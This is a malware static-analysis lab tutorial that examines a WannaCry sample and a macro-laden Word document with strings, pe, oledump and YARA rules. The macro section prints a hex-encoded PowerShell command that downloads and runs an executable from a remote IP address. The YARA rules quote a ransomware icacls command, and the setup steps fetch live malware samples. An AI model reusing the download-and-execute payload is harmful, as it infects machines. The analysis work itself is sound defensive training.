Static Analysis v2

1. ############################
2. # Download the Analysis VM #
3. ############################
4. https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
5. user: infosecaddicts
6. pass: infosecaddicts
7.  
8.  
9.  
10. - Log in to your Ubuntu system with the username 'infosecaddicts' and the password 'infosecaddicts'.
11.  
12.  
13. ###################################
14. # Setting up your virtual machine #
15. ###################################
16.  
17. Here is where we will setup all of the required dependencies for the tools we plan to install
18. ---------------------------Type This-----------------------------------
19. sudo apt update
20. sudo apt-get install -y python3-pip python3-dev unzip python3-setuptools ipython3 build-essential python-pefile python2.7 python-pip python-setuptools mysql-server python-mysqldb python-mysqldb
21.  
22.  
23. sudo pip install -U olefile
24.  
25.  
26. git clone https://github.com/Te-k/pe.git
27. cd pe
28. sudo python3 setup.py install
29. pip3 install .
30. cd ..
31. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
32. infected
33. -----------------------------------------------------------------------
34.  
35.  
36.  
37.  
38. ################
39. # The Scenario #
40. ################
41. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
42.  
43.  
44. The fastest thing you can do is perform static analysis.
45.  
46.  
47.  
48. ###################
49. # Static Analysis #
50. ###################
51.  
52. - After logging please open a terminal window and type the following commands:
53.  
54.  
55. ---------------------------Type This-----------------------------------
56. cd ~
57.  
58. mkdir static_analysis
59.  
60. cd static_analysis
61.  
62. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
63.  
64. unzip wannacry.zip
65. infected
66.  
67. file wannacry.exe
68.  
69. mv wannacry.exe malware.pdf
70.  
71. file malware.pdf
72.  
73. mv malware.pdf wannacry.exe
74.  
75. hexdump -n 2 -C wannacry.exe
76.  
77. ----------------------------------------------------------------------
78.  
79.  
80. ***What is '4d 5a' or 'MZ'***
81. Reference:
82. http://www.garykessler.net/library/file_sigs.html
83.  
84.  
85.  
86.  
87. ---------------------------Type This-----------------------------------
88. objdump -x wannacry.exe
89.  
90. strings wannacry.exe
91.  
92. strings wannacry.exe | grep -i dll
93.  
94. strings wannacry.exe | grep -i library
95.  
96. strings wannacry.exe | grep -i reg
97.  
98. strings wannacry.exe | grep -i key
99.  
100. strings wannacry.exe | grep -i rsa
101.  
102. strings wannacry.exe | grep -i open
103.  
104. strings wannacry.exe | grep -i get
105.  
106. strings wannacry.exe | grep -i mutex
107.  
108. strings wannacry.exe | grep -i irc
109.  
110. strings wannacry.exe | grep -i join
111.  
112. strings wannacry.exe | grep -i admin
113.  
114. strings wannacry.exe | grep -i list
115. ----------------------------------------------------------------------
116.  
117.  
118.  
119.  
120.  
121. ---------------------------Type This-----------------------------------
122. pe info wannacry.exe
123. pe check wannacry.exe
124. pe dump --section text wannacry.exe
125. pe dump --section data wannacry.exe
126. pe dump --section rsrc wannacry.exe
127. pe dump --section reloc wannacry.exe
128. strings rdata | less
129. strings rsrc | less
130. strings text | less
131. ----------------------------------------------------------------------
132.  
133.  
134.  
135.  
136.  
137.  
138.  
139.  
140. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
141.  
142. Quick Google search for "wannacry ransomeware analysis"
143.  
144.  
145. Reference
146. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
147.  
148. - Yara Rule -
149.  
150.  
151. Strings:
152. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
153. $s2 = “Wanna Decryptor” wide ascii nocase
154. $s3 = “.wcry” wide ascii nocase
155. $s4 = “WANNACRY” wide ascii nocase
156. $s5 = “WANACRY!” wide ascii nocase
157. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
158.  
159.  
160.  
161.  
162.  
163.  
164.  
165.  
166. Ok, let's look for the individual strings
167.  
168.  
169. ---------------------------Type This-----------------------------------
170. strings wannacry.exe | grep -i ooops
171.  
172. strings wannacry.exe | grep -i wanna
173.  
174. strings wannacry.exe | grep -i wcry
175.  
176. strings wannacry.exe | grep -i wannacry
177.  
178. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
179. ----------------------------------------------------------------------
180.  
181.  
182.  
183.  
184.  
185.  
186.  
187.  
188.  
189.  
190.  
191.  
192.  
193.  
194.  
195.  
196. ####################################
197. # Tired of GREP - let's try Python #
198. ####################################
199. Decided to make my own script for this kind of stuff in the future. I
200.  
201. Reference1:
202. https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
203.  
204. This is a really good script for the basics of static analysis
205.  
206. Reference:
207. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
208.  
209.  
210. This is really good for showing some good signatures to add to the Python script
211.  
212.  
213. Here is my own script using the signatures (started this yesterday, but still needs work):
214. https://pastebin.com/guxzCBmP
215.  
216.  
217.  
218. ---------------------------Type This-----------------------------------
219. wget https://pastebin.com/raw/guxzCBmP
220.  
221.  
222. mv guxzCBmP am.py
223.  
224.  
225. vi am.py
226.  
227. python2.7 am.py wannacry.exe
228. ----------------------------------------------------------------------
229.  
230.  
231.  
232. ##############
233. # Yara Ninja #
234. ##############
235.  
236. Reference:
237. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
238.  
239. ----------------------------------------------------------------------------
240. rule wannacry_1 : ransom
241. {
242. meta:
243. author = "Joshua Cannell"
244. description = "WannaCry Ransomware strings"
245. weight = 100
246. date = "2017-05-12"
247.  
248. strings:
249. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
250. $s2 = "Wanna Decryptor" wide ascii nocase
251. $s3 = ".wcry" wide ascii nocase
252. $s4 = "WANNACRY" wide ascii nocase
253. $s5 = "WANACRY!" wide ascii nocase
254. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
255.  
256. condition:
257. any of them
258. }
259.  
260. ----------------------------------------------------------------------------
261. rule wannacry_2{
262. meta:
263. author = "Harold Ogden"
264. description = "WannaCry Ransomware Strings"
265. date = "2017-05-12"
266. weight = 100
267.  
268. strings:
269. $string1 = "msg/m_bulgarian.wnry"
270. $string2 = "msg/m_chinese (simplified).wnry"
271. $string3 = "msg/m_chinese (traditional).wnry"
272. $string4 = "msg/m_croatian.wnry"
273. $string5 = "msg/m_czech.wnry"
274. $string6 = "msg/m_danish.wnry"
275. $string7 = "msg/m_dutch.wnry"
276. $string8 = "msg/m_english.wnry"
277. $string9 = "msg/m_filipino.wnry"
278. $string10 = "msg/m_finnish.wnry"
279. $string11 = "msg/m_french.wnry"
280. $string12 = "msg/m_german.wnry"
281. $string13 = "msg/m_greek.wnry"
282. $string14 = "msg/m_indonesian.wnry"
283. $string15 = "msg/m_italian.wnry"
284. $string16 = "msg/m_japanese.wnry"
285. $string17 = "msg/m_korean.wnry"
286. $string18 = "msg/m_latvian.wnry"
287. $string19 = "msg/m_norwegian.wnry"
288. $string20 = "msg/m_polish.wnry"
289. $string21 = "msg/m_portuguese.wnry"
290. $string22 = "msg/m_romanian.wnry"
291. $string23 = "msg/m_russian.wnry"
292. $string24 = "msg/m_slovak.wnry"
293. $string25 = "msg/m_spanish.wnry"
294. $string26 = "msg/m_swedish.wnry"
295. $string27 = "msg/m_turkish.wnry"
296. $string28 = "msg/m_vietnamese.wnry"
297.  
298.  
299. condition:
300. any of ($string*)
301. }
302. ----------------------------------------------------------------------------
303.  
304.  
305.  
306.  
307.  
308.  
309.  
310. #####################################################
311. # Analyzing Macro Embedded Malware #
312. #####################################################
313. ---------------------------Type This-----------------------------------
314. mkdir ~/oledump
315.  
316. cd ~/oledump
317.  
318. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
319.  
320. unzip oledump_V0_0_22.zip
321.  
322. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
323.  
324. unzip 064016.zip
325. infected
326.  
327. python oledump.py 064016.doc
328.  
329. python oledump.py 064016.doc -s A4 -v
330. -----------------------------------------------------------------------
331.  
332.  
333.  
334. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
335. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
336.  
337. ---------------------------Type This-----------------------------------
338. python oledump.py 064016.doc -s A5 -v
339. -----------------------------------------------------------------------
340.  
341. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
342.  
343. ---------------------------Type This-----------------------------------
344. python oledump.py 064016.doc -s A3 -v
345.  
346. - Look for "GVhkjbjv" and you should see:
347.  
348. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
349.  
350. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
351. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
352. -----------------------------------------------------------------------
353.  
354.  
355.  
356. ###############################
357. # Creating a Malware Database #
358. ###############################
359. Creating a malware database (mysql)
360. -----------------------------------
361. - Step 1: Logging in
362. Run the following command in the terminal:
363. ---------------------------Type This-----------------------------------
364. mysql -u root -p (set a password of 'malware')
365.  
366. - Then create one database by running following command:
367.  
368. create database malware;
369.  
370. exit;
371.  
372. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
373.  
374. vi mal_to_db.py (fill in database connection information)
375.  
376. python mal_to_db.py -i
377.  
378. ------- check it to see if the files table was created ------
379.  
380. mysql -u root -p
381. malware
382.  
383. show databases;
384.  
385. use malware;
386.  
387. show tables;
388.  
389. describe files;
390.  
391. exit;
392.  
393. ---------------------------------
394.  
395.  
396. - Now add the malicious file to the DB
397. ---------------------------Type This-----------------------------------
398. python mal_to_db.py -f wannacry.exe -u
399.  
400.  
401.  
402. - Now check to see if it is in the DB
403. ---------------------------Type This-----------------------------------
404. mysql -u root -p
405. malware
406.  
407. mysql> use malware;
408.  
409. select id,md5,sha1,sha256,time FROM files;
410.  
411. mysql> quit;